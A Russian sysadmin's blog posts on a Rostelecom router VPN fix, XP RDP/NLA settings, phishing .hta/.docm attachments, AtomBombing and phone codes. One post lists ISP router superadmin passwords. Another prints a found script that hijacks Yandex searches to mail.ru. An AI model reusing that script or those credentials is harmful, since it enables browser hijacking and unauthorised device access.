hroft_clone3: (Рыба)
Ну, камрады, наконец-то я настроил L2TP через Ростелеком.

Для подключения абонентов к интернету по оптоволоконному кабелю (технология GPON) компания Ростелеком чаще всего использует оптические терминалы марки Huawei. Несмотря на споры вокруг качества данного оборудования, практика показывает, что для домашних нужд оно вполне себя оправдывает. Но есть одно НО. Если надо подключиться к рабочим серверам, а у вас в компании настроен VPN по протоколу L2TP, то это не выходит. Соединение устанавливается, но роутинга до рабочей сети нет. Махинации с таблицей роутинга не помогают. И вот тут-то надо призвать админа-шамана и он сможет, с помощью админобубна, настроить это подключение. Я опишу этот бубен ниже, пусть каждый сможет им потрясти и подключиться нормально, не тратя нервы и деньги на шамана.

ИТАК, НАСТРАИВАЕМ АППАРАТУРУ РОСТЕЛЕКОМА, ЧТОБЫ ДАТЬ СЕБЕ ДОСТУП В СВОЮ ЛОКАЛКУ.


Открываем браузер и переходим по адресу Router-0.PNG
Попадаем на следующую страничку
Router.PNG
Теперь нужны пароли, явки и тому подобное.
Итак.
Имя пользователя telecomadmin или root

Возможные пароли для telecomadmin

admintelecom
NWTF5x%RaK8mVbD
NWTFx5%
nE7jA%5m

Для root возможен пароль admin

Если не подходит, придется искать или звонить на сапорт Ростелекома
(за инфу спасибо сайту "оРостелекоме")
Router-1.PNG
Жамкаем "вход" и .....

Router-2.PNG
Вошли и охреневаем - куды податься-то?

Далее шаманств возможно много, но мы идем в настройки LAN->DHCP settings
Router-3.PNG

Правим немного настройки ....
Отключаем DHCP ретранслятор и DHCP option 125.
Если начнутся проблемы с интернетом, подозреваю, придется включить ретранслятор, но он-то, скорее всего, и запихивает какую-то гадость в маршрутизацию потока.
Ставим свои любимые DNS сервера.
Router-4.PNG

Сохраняемся, перезагружаем компьютер, чтобы переполучить параметры IP .... и .... вуа-ля, при подключении нашего VPN соединения, всё работает, рабочая сеть видна. Можно выдохнуть.


Надеюсь, кому-то эта информация поможет в нелегкой работе админа-шамана.
Удачи вам, коллеги.
hroft_clone3: (Рыба)

Кликабельно


Ну и как это понимать?
Они, что, хотят весь список сотрудников?

Это как, идет к тому, что скоро ниоткуда без личного токена не выйти в инет будет?
Хотят полный и тотальный контроль за всеми пользователями сети установить?
Не перебор-ли это?

Сделают обязательным для доступа в инет использование персональных токенов от госуслуг, нет токена - нет инета нигде, даже на мобиле и дома.
Вполне жизнеспособно получится, технически ... а оплачивать, опять, нам.
Китай отдыхает. Они до такого не додумались.
hroft_clone3: (Рыба)
rdp-клиенты Windows XP не подключаются к RDS Windows 2012R2

Пользователи XP жаловались на такие ошибки rdp клиента:

Because of a security error, the client could not connect to the remote computer. Verify that you are logged on to the network, and then try reconnecting again
The remote session was disconnected because the remote computer received an invalid licensing message from this computer
The remote computer requires Network Level Authentication, which your computer does not support. For assistance, contact your system administrator or technical support.

Покопавшись в документации Microsoft, решили в

первую очередь обновить версию RDP клиента на машинах с XP. После установки rdp клиента 7.0 (ссылка не на Майкрософт, там уже убрали этот апдейт и статью kb969084. Если нет доверия этому сайту, ищем kb969084-x86-rus.exe в другом месте. Для Висты закачка еще жива) (версия rdp 8.0 на XP не устанавливается.), у половины клиентов проблема решилась. Осталась вторая половина….

Начав более подробно копать тему RDS сервера на базе Windows 2012 R2 мы обнаружили, что 2012 сервер по умолчанию требует от своих клиентов обязательной поддержки технологии NLA (Network-Level Authentication – проверки подлинности на уровне сети, подробнее об этой технологии здесь), если же клиент не поддерживает NLA, подключиться к RDS серверу ему не удастся.

Из вышесказанного есть два вывода, чтобы оставшиеся XP-клиенты смогли подключаться по RDP к терминальному серверу 2012 нужно:
отключить проверку NLA на серверах фермы Remote Desktop Services 2012
или включить поддержку NLA на XP-клиентах

Отключаем NLA на сервере RDS 2012

Чтобы на сервере RDS Windows Server 2012 отключить требование обязательного использования NLA клиентами, нужно в консоли Server Manager перейти в раздел Remote Desktop Services -> Collections -> QuickSessionCollection, выбрать Tasks -> Edit Properties, выбрать раздел Security и снять опцию: Allow connections only from computers running Remote Desktop with Network Level Authentication.



Естественно, нужно понимать, что отключение NLA на уровне сервера уменьшает защищенность системы и в общем случае использовать не рекомендуется. Предпочтительнее использовать вторую методику.

Включаем NLA на уровне клиента Windows XP

Поддержка NLA появилась в Windows XP, начиная с SP3, но по умолчанию она не включена. Включить поддержку аутентификации NLA можно только реестр. Для этого:
В ветке реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders нужно отредактировать значение ключа SecurityProviders, добавив в конце credssp.dll (через запятую от его текущего значения)


Далее в ветке HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa добавить строку tspkg в значение параметра Security Packages



После внесения указанных изменений, компьютер нужно перезагрузить

После выполнения всех манипуляций, компьютер с Windows XP SP3 должен без проблем подключится по rdp к терминальной ферме на Windows 2012.


Проверено, с Windows server 2016 те же проблемы, решение то же самое
hroft_clone3: (Рыба)
При приобретении на 5 подключений, я получаю до 5 баз и объем под базы до 5Гб. Возможность установить любые 5 баз из списка, который по адресу www.arenda1c.ru/materials/tarifs.html .При тарифе стандартный, автообновление конфигураций и ежедневное резервное копирование.баз. Доступ до бэкапов по FTP. Архивные копии хранятся 10 дней. Это копия папки с базами. Можно добавить отчетность 1С, возможность отправлять отчеты из 1С, без необходимости приобретения Аргоса и других систем отчетности.


5 одновременных подключений, 5 баз, 5 Гб места 5625 за месяц, с учетом оплаты сразу за год, или 6250, если ежемесячно. 1С отчетность для СПб стоит 4900 в год.
2 одновременных подключения, 2 базы, 3 Гб места 2350 за месяц, с учетом оплаты сразу на год, или 2600, если ежемесячно. 1С отчетность для СПб стоит 4900 в год.

Можно поставить, хоть 1С Комлексная автоматизация, хоть комплект 1С Бухгалтерия + 1С ЗуП, от этого цена не изменяется.

Интересно ваше мнение по этому поводу.
hroft_clone3: (Рыба)
Вот что пришлось вчера, 10.01.2016 написать всем в офисе


Сегодня появился новый вирус.
Приходит письмо с вложением 83 килобайта и комментарием, что это счёт.
Внутри архива находится файл с именем, типа
Скан-копия _ 10 января 2017г. Составлено и подписано главным бухгалтером. Экспорт из 1С.e7f6721_dосх .hta
Или
Скан-копия _ 10 января 2017г. Составлено и подписано главным бухгалтером. Экспорт из 1С.b90bc09_хls_ .hta

Обратите внимание, что расширение .HTA размещено после пробела и, обычно, не отображается.
Обратите внимание, в письме вложены не сами документы, они многими почтовиками блокируются, а архив, содержащий эти файлы.

В антивирусные базы этот вирус попал только к концу сегодняшнего дня, да и то, еще, не во все.





Вот, что сегодня говорит Каспер



Вчера утром он говорил, что всё в порядке .....
Мля, как заколебали эти вирусописаки
hroft_clone3: (Рыба)
Новый способ атаки, который работает в любой версии Windows, продемонстрировали специалисты enSilo и описали методику в блоге компании. Она получила название «Атомная бомбардировка» и позволяет обходить практически все современные механизмы защиты программного обеспечения.


Как работает «Атомная бомбардировка»

Новый метод атаки затрагивает таблицы атомов, которые приложения для Windows используют для хранения данных об объектах, строках, а также идентификаторах доступа. Практически все приложения для Windows могут вносить изменения в таблицы атомов.
Windows позволяет внедрять в таблицы атомов любой код, в том числе и вредоносный

Используя эту особенность операционной системы, хакеры могут внедрять вирусный код в легитимные процессы, и он останется незаметным для механизмов защиты. Особенно выгодно задействовать процессы из «белого» (разрешенного) списка каждого приложения.

Технология «Атомной бомбардировки» также позволяет выполнять браузерные атаки. В результате злоумышленники могут получить снимки экрана, подменить контент (к примеру, номер счета и сумму при выполнении банковского платежа) и пароли, которые хранятся в браузере в зашифрованном виде.

Однако, к примеру, Google Chrome шифрует пароли с помощью Windows Data Protection API (DPAPI). Если вредоносное ПО внедрить в процесс текущего пользователя, оно сможет увидеть пароли в виде простого текста – API использует данные пользователя и для шифрования, и для расшифровки.
Опаснее, чем кажется

Обычно после обнаружения подобных уязвимостей разработчики ОС выпускают патчи, которые закрывают «дыры». Однако в этом случае ситуация гораздо сложнее. Чтобы исключить возможность «Атомной бомбардировки», Microsoft придется пересмотреть базовые механизмы операционной системы. В короткие сроки исправить это не получится.
©


А теперь проверим на фэйк или скрытую рекламу :)

Что такое атом

Если говорить простыми словами, то представте себе, что где то внутри ядра ОС есть что то подобное TStringList (список строк). А для программиста есть функции добавить/удалить/проверить наличие строки по имени. после перегрузки таблица очищается.
Как таблица устроенна внутри вам знать не обязательно, Майкрософт не гарантирует, что она будет внутри оставаться одинаковой от версии версии. но то, что функции будут работать - да.
интересный и простой пример можно стянуть здесь http://www.delphi-files.com/download/samples/samples/os/appsdemo.zip
Основное предназначение атомов - это "оставлять строковые метки" для других приложений, которые зная имя метки, могут её проверить. таким образом устроенна защита у некоторых программах. они вначале проверяют, нет ли атома при старте, если нет - создаёт и запускает, есть - просто завершает работу. таким образом программа будет запускаться только раз за сессию работы, тоесть один раз после перегрузки
hroft_clone3: (Рыба)
Этот вопрос возникает с пугающей регулярностью, но все ищут по странным справочникам, когда на сайте россвязи есть полный список всех кодов с разбивкой по операторам и регионам. Там же есть ворма для поиска по коду всех записей из базы, и не надо далеко лазать и постоянно опасаться какой-либо гадости подцепить с левых сайтов.



Вот пример выдачи по коду, помещу его в спойлер


Найдено записей: 92
Код 	Диапазон 	Емкость 	Оператор 	Регион
964 	0 - 249999 	250000 	ПАО "Вымпел-Коммуникации" 	Республика Дагестан
964 	250000 - 299999 	50000 	ПАО "Вымпел-Коммуникации" 	Республика Ингушетия
964 	300000 - 419999 	120000 	ПАО "Вымпел-Коммуникации" 	Республика Кабардино-Балкарская
964 	420000 - 429999 	10000 	ПАО "Вымпел-Коммуникации" 	Республика Карачаево-Черкесская
964 	430000 - 469999 	40000 	ОАО "Вымпел-Коммуникации" 	Республика Коми
964 	470000 - 489999 	20000 	ПАО "Вымпел-Коммуникации" 	Республика Кабардино-Балкарская
964 	490000 - 549999 	60000 	ПАО "Вымпел-Коммуникации" 	Республика Дагестан
964 	550000 - 599999 	50000 	ПАО "Вымпел-Коммуникации" 	Республика Ингушетия
964 	600000 - 759999 	160000 	ПАО "Вымпел-Коммуникации" 	Республика Чеченская
964 	760000 - 779999 	20000 	ОАО "Вымпел-Коммуникации" 	Республика Саха (Якутия)
964 	780000 - 799999 	20000 	ПАО "Вымпел-Коммуникации" 	Сахалинская обл.
964 	800000 - 899999 	100000 	ОАО "Вымпел-Коммуникации" 	Алтайский край
964 	900000 - 949999 	50000 	ОАО "Вымпел-Коммуникации" 	Томская обл.
964 	950000 - 969999 	20000 	ОАО "Вымпел-Коммуникации" 	Томская обл.
964 	970000 - 989999 	20000 	ОАО "Вымпел-Коммуникации" 	Ханты - Мансийский - Югра АО
964 	1000000 - 1299999 	300000 	ОАО "Вымпел-Коммуникации" 	Иркутская область
964 	1300000 - 1359999 	60000 	ОАО "Вымпел-Коммуникации" 	Тамбовская обл.
964 	1360000 - 1379999 	20000 	ОАО "Вымпел-Коммуникации" 	Ярославская обл.
964 	1400000 - 1499999 	100000 	ОАО "Вымпел-Коммуникации" 	Калужская обл.
964 	1500000 - 1569999 	70000 	ОАО "Вымпел-Коммуникации" 	Костромская обл.
964 	1570000 - 1619999 	50000 	ОАО "Вымпел-Коммуникации" 	Рязанская обл.
964 	1620000 - 1669999 	50000 	ОАО "Вымпел-Коммуникации" 	Тверская обл.
964 	1670000 - 1679999 	10000 	ОАО "Вымпел-Коммуникации" 	Ярославская обл.
964 	1680000 - 1699999 	20000 	ОАО "Вымпел-Коммуникации" 	Орловская обл.
964 	1700000 - 1799999 	100000 	ОАО "Вымпел-Коммуникации" 	Ханты - Мансийский - Югра АО
964 	1800000 - 1849999 	50000 	ОАО "Вымпел-Коммуникации" 	Республика Удмуртская
964 	1850000 - 1999999 	150000 	ОАО "Вымпел-Коммуникации" 	Пермский край
964 	2000000 - 2099999 	100000 	ОАО "Вымпел-Коммуникации" 	Ямало-Ненецкий АО
964 	2100000 - 2309999 	210000 	ОАО "Вымпел-Коммуникации" 	Иркутская область
964 	2310000 - 2319999 	10000 	ОАО "Вымпел-Коммуникации" 	Приморский край
964 	2320000 - 2359999 	40000 	ОАО "Вымпел-Коммуникации" 	Хабаровский край
964 	2360000 - 2379999 	20000 	ОАО "Вымпел-Коммуникации" 	Магаданская область
964 	2380000 - 2399999 	20000 	ОАО "Вымпел-Коммуникации" 	Магаданская область
964 	2400000 - 2499999 	100000 	ОАО "Вымпел-Коммуникации" 	Челябинская обл.
964 	2500000 - 2589999 	90000 	ОАО "Вымпел-Коммуникации" 	Кировская обл.
964 	2590000 - 2599999 	10000 	ОАО "Вымпел-Коммуникации" 	Тюменская обл.
964 	2600000 - 2899999 	300000 	ОАО "Вымпел-Коммуникации" 	Иркутская область
964 	2900000 - 2999999 	100000 	ОАО "Вымпел-Коммуникации" 	Архангельская обл.
964 	3000000 - 3029999 	30000 	ОАО "Вымпел-Коммуникации" 	Архангельская обл.
964 	3030000 - 3069999 	40000 	ОАО "Вымпел-Коммуникации" 	Вологодская обл.
964 	3070000 - 3099999 	30000 	ОАО "Вымпел-Коммуникации" 	Мурманская обл.
964 	3100000 - 3129999 	30000 	ОАО "Вымпел-Коммуникации" 	Новгородская обл.
964 	3130000 - 3169999 	40000 	ОАО "Вымпел-Коммуникации" 	Псковская обл.
964 	3170000 - 3199999 	30000 	ОАО "Вымпел-Коммуникации" 	Республика Карелия
964 	3200000 - 3299999 	100000 	ОАО "Вымпел-Коммуникации" 	г. Санкт-Петербург и Ленинградская область
964 	3300000 - 3399999 	100000 	ОАО "Вымпел-Коммуникации" 	г. Санкт-Петербург и Ленинградская область
964 	3400000 - 3499999 	100000 	ОАО "Вымпел-Коммуникации" 	г. Санкт-Петербург и Ленинградская область
964 	3500000 - 3599999 	100000 	ОАО "Вымпел-Коммуникации" 	Иркутская область
964 	3600000 - 3999999 	400000 	ОАО "Вымпел-Коммуникации" 	г. Санкт-Петербург и Ленинградская область
964 	4000000 - 4149999 	150000 	ПАО "Вымпел-Коммуникации" 	Республика Бурятия
964 	4150000 - 4299999 	150000 	ОАО "Вымпел-Коммуникации" 	Республика Саха (Якутия)
964 	4300000 - 4549999 	250000 	ОАО "Вымпел-Коммуникации" 	Приморский край
964 	4550000 - 4599999 	50000 	ОАО "Вымпел-Коммуникации" 	Магаданская область
964 	4600000 - 4749999 	150000 	ОАО "Вымпел-Коммуникации" 	Забайкальский край
964 	4750000 - 4799999 	50000 	ОАО "Вымпел-Коммуникации" 	Еврейская автономная область
964 	4800000 - 4819999 	20000 	ОАО "Вымпел-Коммуникации" 	Чукотский автономный округ
964 	4820000 - 4849999 	30000 	ОАО "Вымпел-Коммуникации" 	Ярославская обл.
964 	4850000 - 4899999 	50000 	ОАО "Вымпел-Коммуникации" 	Свердловская обл.
964 	4900000 - 4999999 	100000 	ОАО "Вымпел-Коммуникации" 	Ивановская обл.
964 	5000000 - 5399999 	400000 	ОАО "Вымпел-Коммуникации" 	г. Москва и Московская область
964 	5400000 - 5499999 	100000 	ОАО "Вымпел-Коммуникации" 	Иркутская область
964 	5500000 - 5999999 	500000 	ОАО "Вымпел-Коммуникации" 	г. Москва и Московская область
964 	6000000 - 6099999 	100000 	ОАО "Вымпел-Коммуникации" 	Алтайский край
964 	6100000 - 6149999 	50000 	ОАО "Вымпел-Коммуникации" 	г. Санкт-Петербург и Ленинградская область
964 	6150000 - 6199999 	50000 	ОАО "Вымпел-Коммуникации" 	Смоленская обл.
964 	6200000 - 6499999 	300000 	ОАО "Вымпел-Коммуникации" 	г. Москва и Московская область
964 	6500000 - 6599999 	100000 	ОАО "Вымпел-Коммуникации" 	Иркутская область
964 	6600000 - 6749999 	150000 	ОАО "Вымпел-Коммуникации" 	Вологодская обл.
964 	6750000 - 6799999 	50000 	ОАО "Вымпел-Коммуникации" 	Псковская обл.
964 	6800000 - 6889999 	90000 	ОАО "Вымпел-Коммуникации" 	Мурманская обл.
964 	6890000 - 6899999 	10000 	ОАО "Вымпел-Коммуникации" 	Мурманская обл.
964 	6900000 - 6949999 	50000 	ОАО "Вымпел-Коммуникации" 	Новгородская обл.
964 	6950000 - 6999999 	50000 	ОАО "Вымпел-Коммуникации" 	Владимирская обл.
964 	7000000 - 7299999 	300000 	ОАО "Вымпел-Коммуникации" 	г. Москва и Московская область
964 	7300000 - 7599999 	300000 	ОАО "Вымпел-Коммуникации" 	Иркутская область
964 	7600000 - 7699999 	100000 	ОАО "Вымпел-Коммуникации" 	г. Москва и Московская область
964 	7700000 - 7999999 	300000 	ОАО "Вымпел-Коммуникации" 	г. Москва и Московская область
964 	8000000 - 8249999 	250000 	ОАО "Вымпел-Коммуникации" 	Иркутская область
964 	8250000 - 8299999 	50000 	ОАО "Вымпел-Коммуникации" 	Еврейская автономная область
964 	8300000 - 8399999 	100000 	ОАО "Вымпел-Коммуникации" 	Нижегородская обл.
964 	8400000 - 8449999 	50000 	ПАО "Вымпел-Коммуникации" 	Республика Мордовия
964 	8450000 - 8499999 	50000 	ПАО "Вымпел-Коммуникации" 	Саратовская обл.
964 	8500000 - 8549999 	50000 	ПАО "Вымпел-Коммуникации" 	Республика Мордовия
964 	8550000 - 8599999 	50000 	ПАО "Вымпел-Коммуникации" 	Ульяновская обл.
964 	8600000 - 8649999 	50000 	ПАО "Вымпел-Коммуникации" 	Республика Марий Эл
964 	8650000 - 8779999 	130000 	ПАО "Вымпел-Коммуникации" 	Пензенская обл.
964 	8780000 - 8799999 	20000 	ПАО "Вымпел-Коммуникации" 	Саратовская обл.
964 	8800000 - 8899999 	100000 	ПАО "Вымпел-Коммуникации" 	Астраханская обл.
964 	8900000 - 9499999 	600000 	ПАО "Вымпел-Коммуникации" 	Краснодарский край
964 	9500000 - 9659999 	160000 	ПАО "Вымпел-Коммуникации" 	Республика Башкортостан
964 	9660000 - 9929999 	270000 	ПАО "Вымпел-Коммуникации" 	Самарская обл.
964 	9930000 - 9999999 	70000 	ПАО "Вымпел-Коммуникации" 	Саратовская обл.

hroft_clone3: (Рыба)
захожу на ya.ru ввожу поисковую строку ... и охреневаю. Перебрасывает на поиск mail.ru
Проверяю в полновесной версии - та же хрень, поиск картинок - аналогично.
Начал смотреть код.
Нашел вот такой кусок кода


new Image().src = "//counter.yadro.ru/hit;pbot4?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random();

new Image().src = "//counter.yadro.ru/hit;pbot4up?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random();(function(){
if(window!==top) return;

var reqdefault="http://go.mail.ru/search?q={REQ}&gp=789157&frc=789157";

var loc = "";
var w = "text=";
var r = new RegExp("[\\?#&]"+w+"([^\\?#&]+)", "g");

var f=function(){
if (loc!=window.location.toString()){
loc=window.location.toString();
q = loc.match(r);
if (q!=null){
req = q.slice(-1)[0].substr(w.length+1);
window.location=reqdefault.replace("{REQ}", req);

}
}

};
f();

setInterval(f, 100);

})();



Бля, и как это понимать?
Яндекс спиздил у мэйла исходники и не справился с заменами ?
Или отдается под mail.ru?
hroft_clone3: (Рыба)
Начали приходить вот такие письма. Теперь вложение имеет расширение DOCM - документ ворда с макросами.
Проверил, внутри под видом VBA макроса лежит полновесный exeшник.

Проверил на Касперском одно такое вложение, да, вирусня.

Результат проверки файл заражен
Найденные угрозы Trojan-Downloader.MSWord.Agent.apa
Размер файла 27.91KB
Тип файла OOXML/DOCUMENT
Дата проверки 2016-08-26 07:58:30
Дата выпуска баз 2016-08-26 04:25:07 UTC
MD5 1e625b5a03085f0839ccd3afe1150aca
SHA1 9e1af668df202b3bf51909e7c3df9b79a4eccade
SHA256 93299f982f114aad9c2a4f562569bea7d6a375c4f3ec7c6243760be417bcc914

Вот так выглядят сообщения.







Удачи, коллеги, не попадайтесь на такое.
hroft_clone3: (Рыба)
Лицензионное соглашение любого ПО: "Мы его вам продаем, но вы на него никаких прав не имеете"

Вот они, все ваши права



ПРАВА НА ИНТЕЛЛЕКТУАЛЬНУЮ СОБСТВЕННОСТЬ. Правовой титул и все права интеллектуальной собственности на программу (включая, но не ограничиваясь только ими, любые входящие в нее графические изображения, фотографии, анимации, видеозаписи, звукозаписи, музыку, текст и дополнительные программы — “applets”), содержание сопровождающих ее печатных материалов и любые копии программы принадлежат корпорации Майкрософт и ее поставщикам. Правовой титул и все права интеллектуальной собственности на содержание и в отношении его, которое не является частью программы, но доступ к которому предоставляет программа, принадлежат владельцам прав на это содержание и защищены законами об авторском праве и другими законами и международными соглашениями о правах на интеллектуальную собственность. Настоящее лицензионное соглашение не предоставляет вам никаких прав на использование такого содержания. Если данная программа содержит только электронную документацию, разрешается напечатать одну копию этой документации. Копирование сопровождающих программу печатных материалов запрещается.

РЕЗЕРВНАЯ КОПИЯ. После установки одной копии программы, лицензия на использование которой предоставляется данным лицензионным соглашением, разрешается сохранить исходные носители, на которых данная программа была предоставлена вам корпорацией Майкрософт, исключительно с целью архивирования или сохранения резервной копии. Если для использования программы на устройстве необходимы исходные носители, разрешается сделать одну копию программы исключительно для целей резервного копирования или архивирования. Запрещается иначе, чем явно оговорено в настоящем лицензионном соглашении, создавать копии программы и сопроводительной печатной документации.






А о нашей ответственности и речи не идет.

У M$ вот так выглядит их ответственность :)


ОТКАЗ ОТ ГАРАНТИЙ. ОГРАНИЧЕННАЯ ГАРАНТИЯ, ССЫЛКА НА КОТОРУЮ ПРИВЕДЕНА НИЖЕ, ЯВЛЯЕТСЯ ЕДИНСТВЕННОЙ ПРЕДОСТАВЛЯЕМОЙ ВАМ ЯВНОЙ ГАРАНТИЕЙ, ЗАМЕНЯЮЩЕЙ ЛЮБЫЕ ДРУГИЕ ЯВНЫЕ ГАРАНТИИ (ЕСЛИ ТАКОВЫЕ ИМЕЛИСЬ), ПРИВЕДЕННЫЕ В ДОКУМЕНТАЦИИ ИЛИ НА УПАКОВКЕ. ЗА ИСКЛЮЧЕНИЕМ ДАННОЙ ОГРАНИЧЕННОЙ ГАРАНТИИ И В НАИБОЛЬШЕЙ СТЕПЕНИ, ДОПУСКАЕМОЙ ДЕЙСТВУЮЩИМ ЗАКОНОДАТЕЛЬСТВОМ, КОРПОРАЦИЯ МАЙКРОСОФТ И ЕЕ ПОСТАВЩИКИ ПРЕДОСТАВЛЯЮТ ПРОГРАММУ И (ЕСЛИ ТАКОВЫЕ ПРЕДОСТАВЛЯЮТСЯ) УСЛУГИ ПО ПОДДЕРЖКЕ НА УСЛОВИЯХ «КАК ЕСТЬ», СО ВСЕМИ НЕИСПРАВНОСТЯМИ, И ОТКАЗЫВАЮТСЯ ОТ ВСЕХ ДРУГИХ ЯВНЫХ, ПОДРАЗУМЕВАЕМЫХ ИЛИ ПРЕДУСМОТРЕННЫХ ЗАКОНОДАТЕЛЬСТВОМ ГАРАНТИЙ И УСЛОВИЙ, ВКЛЮЧАЯ (НО НЕ ОГРАНИЧИВАЯСЬ ТОЛЬКО ИМИ) ОТКАЗ ОТ ПОДРАЗУМЕВАЕМОЙ ГАРАНТИИ, ОБЯЗАТЕЛЬСТВ ИЛИ УСЛОВИЙ ПРИГОДНОСТИ ДЛЯ ПРОДАЖИ И ПРИМЕНИМОСТИ ДЛЯ ОПРЕДЕЛЕННОЙ ЦЕЛИ, ТОЧНОСТИ ИЛИ ПОЛНОТЫ ОТВЕТОВ ИЛИ РЕЗУЛЬТАТОВ РАБОТЫ, ГАРАНТИИ ВЫСОКОЙ КВАЛИФИКАЦИИ, ОТСУТСТВИЯ ВИРУСОВ, ОТСУТСТВИЯ НЕБРЕЖНОСТИ ПРИ ИЗГОТОВЛЕНИИ ПРОГРАММЫ, А ТАКЖЕ ПРЕДОСТАВЛЕНИЯ ИЛИ НЕПРЕДОСТАВЛЕНИЯ УСЛУГ ПО ТЕХНИЧЕСКОЙ ПОДДЕРЖКЕ. КРОМЕ ТОГО, ПО ОТНОШЕНИЮ К ДАННОЙ ПРОГРАММЕ НЕ ОБУСЛАВЛИВАЮТСЯ И НЕ ПРЕДОСТАВЛЯЮТСЯ ГАРАНТИИ ПРАВ СОБСТВЕННОСТИ, СПОКОЙНОГО ВЛАДЕНИЯ И ПОЛЬЗОВАНИЯ, СООТВЕТСТВИЯ ОПИСАНИЮ ИЛИ ОТСУТСТВИЯ НАРУШЕНИЯ ПРАВ НА ИНТЕЛЛЕКТУАЛЬНУЮ СОБСТВЕННОСТЬ.

ИСКЛЮЧЕНИЕ ОТВЕТСТВЕННОСТИ ЗА УЩЕРБ. В НАИБОЛЬШЕЙ СТЕПЕНИ, ДОПУСКАЕМОЙ ДЕЙСТВУЮЩИМ ЗАКОНОДАТЕЛЬСТВОМ, НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ КОРПОРАЦИЯ МАЙКРОСОФТ И ЕЕ ПОСТАВЩИКИ НЕ НЕСУТ ОТВЕТСТВЕННОСТЬ ЗА КАКОЙ-ЛИБО ОСОБЫЙ, СЛУЧАЙНЫЙ, КОСВЕННЫЙ ИЛИ ОПОСРЕДОВАННЫЙ УЩЕРБ ИЛИ УБЫТКИ (ВКЛЮЧАЯ, НО НЕ ОГРАНИЧИВАЯСЬ ТОЛЬКО ПЕРЕЧИСЛЕННЫМ, УПУЩЕННУЮ ВЫГОДУ, УБЫТКИ, ВЫЗВАННЫЕ УТРАТОЙ КОНФИДЕНЦИАЛЬНОЙ ИЛИ ИНОЙ ИНФОРМАЦИИ, ПЕРЕРЫВАМИ В КОММЕРЧЕСКОЙ ИЛИ ПРОИЗВОДСТВЕННОЙ ДЕЯТЕЛЬНОСТИ, НАНЕСЕНИЕМ УЩЕРБА ЗДОРОВЬЮ, НАРУШЕНИЕМ НЕПРИКОСНОВЕННОСТИ ЧАСТНОЙ ЖИЗНИ, НЕИСПОЛНЕНИЕМ ЛЮБОГО ОБЯЗАТЕЛЬСТВА, ВКЛЮЧАЯ ОБЯЗАТЕЛЬСТВО ДЕЙСТВОВАТЬ ДОБРОСОВЕСТНО И С РАЗУМНОЙ ОСМОТРИТЕЛЬНОСТЬЮ, УБЫТКИ, ВЫЗВАННЫЕ НЕБРЕЖНОСТЬЮ, ЛЮБОЙ ИНОЙ УЩЕРБ И ПРОЧИЕ УБЫТКИ ИМУЩЕСТВЕННОГО ИЛИ ИНОГО ХАРАКТЕРА), ВОЗНИКАЮЩИЕ В СВЯЗИ С ИСПОЛЬЗОВАНИЕМ ИЛИ НЕВОЗМОЖНОСТЬЮ ИСПОЛЬЗОВАНИЯ ПРОГРАММЫ ЛИБО ОКАЗАНИЕМ ИЛИ НЕОКАЗАНИЕМ УСЛУГ ПО ТЕХНИЧЕСКОЙ ПОДДЕРЖКЕ, А ТАКЖЕ С ЛЮБЫМИ ДРУГИМИ ПОЛОЖЕНИЯМИ НАСТОЯЩЕГО ЛИЦЕНЗИОННОГО СОГЛАШЕНИЯ, ДАЖЕ В СЛУЧАЕ ОТКАЗА РАБОТЫ ПРОГРАММЫ, ГРАЖДАНСКОГО ПРАВОНАРУШЕНИЯ (ВКЛЮЧАЯ ХАЛАТНОСТЬ), СТРОГОЙ ОТВЕТСТВЕННОСТИ, НАРУШЕНИЯ ДОГОВОРА ИЛИ НАРУШЕНИЯ ГАРАНТИИ КОРПОРАЦИИ МАЙКРОСОФТ ИЛИ ЕЕ ПОСТАВЩИКОВ, ДАЖЕ ЕСЛИ КОРПОРАЦИЯ МАЙКРОСОФТ ИЛИ ЛЮБОЙ ЕЕ ПОСТАВЩИК БЫЛИ ЗАРАНЕЕ ИЗВЕЩЕНЫ О ВОЗМОЖНОСТИ ТАКОГО УЩЕРБА ИЛИ УБЫТКОВ.

ОГРАНИЧЕНИЕ ОТВЕТСТВЕННОСТИ И РАЗМЕРА ВОЗМЕЩЕНИЯ УЩЕРБА. НЕЗАВИСИМО ОТ ХАРАКТЕРА И ПРИЧИН ПРИЧИНЕННОГО ВАМ УЩЕРБА ИЛИ ПОНЕСЕННЫХ УБЫТКОВ (ВКЛЮЧАЯ ВСЕ БЕЗ ИСКЛЮЧЕНИЯ ПЕРЕЧИСЛЕННЫЕ ВЫШЕ СЛУЧАИ УЩЕРБА И/ИЛИ УБЫТКОВ, А ТАКЖЕ ЛЮБЫЕ ПРЯМЫЕ ИЛИ ОБЩИЕ УЩЕРБ И/ИЛИ УБЫТКИ), МАКСИМАЛЬНЫЙ РАЗМЕР ОТВЕТСТВЕННОСТИ КОРПОРАЦИИ МАЙКРОСОФТ ИЛИ ЛЮБОГО ЕЕ ПОСТАВЩИКА (ЗА ИСКЛЮЧЕНИЕМ КОМПЕНСАЦИИ В ВИДЕ РЕМОНТА ИЛИ ЗАМЕНЫ ПРОДУКТА, ПРЕДОСТАВЛЯЕМОЙ ПО ВЫБОРУ КОРПОРАЦИЕЙ МАЙКРОСОФТ В СВЯЗИ С НАРУШЕНИЕМ ОГРАНИЧЕННОЙ ГАРАНТИИ) НЕ МОЖЕТ ПРЕВЫСИТЬ БОЛЬШЕЙ ИЗ СЛЕДУЮЩИХ СУММ: СУММЫ, ФАКТИЧЕСКИ УПЛАЧЕННОЙ ВАМИ ПРИ ПРИОБРЕТЕНИИ ПРОГРАММЫ, ИЛИ СУММЫ, ЭКВИВАЛЕНТНОЙ 5 ДОЛЛАРАМ США. ПЕРЕЧИСЛЕННЫЕ ВЫШЕ ОГРАНИЧЕНИЯ, ИСКЛЮЧЕНИЯ И ОТКАЗЫ (ВКЛЮЧАЯ РАЗДЕЛЫ 7, 8 И ПОЛОЖЕНИЯ ОГРАНИЧЕННОЙ ГАРАНТИИ) ДЕЙСТВУЮТ В НАИБОЛЬШЕЙ СТЕПЕНИ, ДОПУСКАЕМОЙ ДЕЙСТВУЮЩИМ 